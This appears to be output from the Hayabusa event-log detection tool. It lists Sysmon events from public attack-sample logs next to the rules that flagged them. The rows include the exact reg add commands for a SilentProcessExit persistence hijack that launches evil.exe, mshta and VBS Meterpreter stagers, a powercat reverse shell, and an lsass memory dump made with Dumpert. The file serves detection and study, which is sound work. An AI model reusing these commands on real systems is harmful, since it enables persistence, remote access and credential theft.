| PGUID: 365ABB72-1E5B-5D04-0000-00109EF80C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:26.811 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1724 | PGUID: 365ABB72-1E54-5D04-0000-0010B7B30C00 | Hash: SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:26.811 
+09:00,IEWIN7,7,info,Exec,WMI Modules Loaded,,../hayabusa-rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:26.999 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp"" | Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | LID: 0xbc013 | PID: 2980 | PGUID: 365ABB72-1E5E-5D04-0000-0010EF5E0D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:53.358 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Process: C:\Windows\System32\dllhost.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0xbc013 | PID: 3284 | PGUID: 365ABB72-1E79-5D04-0000-0010EADE0E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"" | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html | LID: 0x135a4 | PID: 652 | PGUID: 365ABB72-9AA6-5D04-0000-00109C850F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Evas | 
Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:44.106 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49159 (IEWIN7) | Dst: 10.0.2.18:4443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 652 | PGUID: 365ABB72-9AA6-5D04-0000-00109C850F00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:14:32.809 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Process: C:\Windows\System32\dllhost.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x135a4 | PID: 3892 | PGUID: 365ABB72-9AD8-5D04-0000-0010C08C1000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:21:50.488 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | Process: C:\Program Files\Internet Explorer\iexplore.exe | User: IEWIN7\IEUser | Parent Cmd: 
C:\Windows\Explorer.EXE | LID: 0x135a4 | PID: 540 | PGUID: 365ABB72-9C8E-5D04-0000-0010D0421600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:21:51.035 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2 | Process: C:\Program Files\Internet Explorer\iexplore.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | LID: 0x135a4 | PID: 984 | PGUID: 365ABB72-9C8E-5D04-0000-001080561600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"" | Process: C:\Windows\System32\wscript.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | LID: 0x135a4 | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Exec,WScript or CScript Dropper,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Exec,Suspicious Script Execution From Temp 
Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.973 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\wscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600 | Hash: SHA1=F4F7354475114E39447975211F5D0A5FA8DB8367,MD5=77B25423AD769057258786540205F6C8,SHA256=20B2A5B34D764D92028CF5EAB46A91F2F7F1A0ECC3FEBA4FC3CDF881AB3A136C,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:08.473 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49162 (IEWIN7) | Dst: 10.0.2.18:4443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\wscript.exe | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-20 02:22:37.897 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1356 | PGUID: 365ABB72-6F5D-5D0A-0000-00109B331300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add 
""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 2504 | PGUID: 365ABB72-6F61-5D0A-0000-0010DB351300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,../hayabusa-rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:43.944 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence via SilentProcessExit hijack | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\ReportingMode: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 2504 | PGUID: 365ABB72-6F61-5D0A-0000-0010DB351300,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:43.944 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe"" | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1956 | PGUID: 
365ABB72-6F63-5D0A-0000-0010F93A1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,../hayabusa-rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:45.694 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence via SilentProcessExit hijack | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\MonitorProcess: C:\windows\temp\evil.exe | Process: C:\Windows\system32\reg.exe | PID: 1956 | PGUID: 365ABB72-6F63-5D0A-0000-0010F93A1300,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,../hayabusa-rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:55.397 +09:00,IEWIN7,1,info,,Process Created,"Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1352 | PGUID: 365ABB72-6F6F-5D0A-0000-001046451300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:58.944 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\windows\temp\evil.exe | Process: C:\Windows\Temp\evil.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\werfault.exe"" -s 
-t 1340 -i 1352 -e 1352 -c 0 | LID: 0x134a4 | PID: 2112 | PGUID: 365ABB72-6F72-5D0A-0000-001004551300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:58.944 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:01.928 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe | Process: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT AUTHORITY\System:Service: | LID: 0x3e7 | PID: 1224 | PGUID: 365ABB72-6F75-5D0A-0000-001082611300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:01.990 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe | Process: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 272 | PGUID: 365ABB72-6F75-5D0A-0000-0010E5671300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:02.350 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin | Process: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe | User: IEWIN7\IEUser | Parent Cmd: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} 
S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1] | LID: 0x134fc | PID: 3744 | PGUID: 365ABB72-6F76-5D0A-0000-001064701300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:10.334 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x134fc | PID: 2396 | PGUID: 365ABB72-6F7C-5D0A-0000-0010FE201400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:11.694 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\windows\temp\evil.exe | Process: C:\Windows\Temp\evil.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 0 | LID: 0x134fc | PID: 3800 | PGUID: 365ABB72-6F7F-5D0A-0000-0010B66E1400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:23:11.694 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 17:07:42.331 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\NETSTAT.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 1284 | Tgt PGUID: 365ABB72-3ECE-5D0B-0000-00107F7F1A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:42.331 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\NETSTAT.EXE"" -na | Process: C:\Windows\System32\NETSTAT.EXE | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 1284 | PGUID: 365ABB72-3ECE-5D0B-0000-00107F7F1A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:42.331 +09:00,IEWIN7,1,low,Disc,Suspicious Listing of Network Connections,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.909 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 888 | Tgt PGUID: 365ABB72-3ED4-5D0B-0000-00106C871A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.909 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 888 | PGUID: 
365ABB72-3ED4-5D0B-0000-00106C871A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.925 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 1440 | Tgt PGUID: 365ABB72-3ED4-5D0B-0000-0010B2871A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:48.925 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 1440 | PGUID: 365ABB72-3ED4-5D0B-0000-0010B2871A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:50.378 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:4444 (IEWIN7) | Dst: 10.0.2.18:38208 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 816 | PGUID: 365ABB72-3D05-5D0B-0000-001004220D00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Disc,Local Accounts 
Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd"" | LID: 0x13529 | PID: 1476 | PGUID: 365ABB72-3ED8-5D0B-0000-0010398F1A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:58.816 +09:00,IEWIN7,1,low,Disc,Suspicious Execution of Systeminfo,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_systeminfo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 17:07:58.816 +09:00,IEWIN7,1,info,,Process Created,"Cmd: systeminfo | Process: C:\Windows\System32\systeminfo.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd"" | LID: 0x13529 | PID: 3820 | PGUID: 365ABB72-3EDE-5D0B-0000-001032961A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: Outflank-Dumpert.exe | Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 3572 | PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Hash: 
SHA1=3A41FF5A6CDEC8829876E0486A0072BC8D13DCF1,MD5=D4940C501545BCFD11D6DC75B5D0FEC9,SHA256=38879FE4AA25044DB241B093E6A1CF904BA9F4E999041C0CC039E2D5F7ABA044,IMPHASH=88788EE624180BE467F3C32F4720AA97",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | PID: 3572 | PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3572 | Src PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,../hayabusa-rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx 
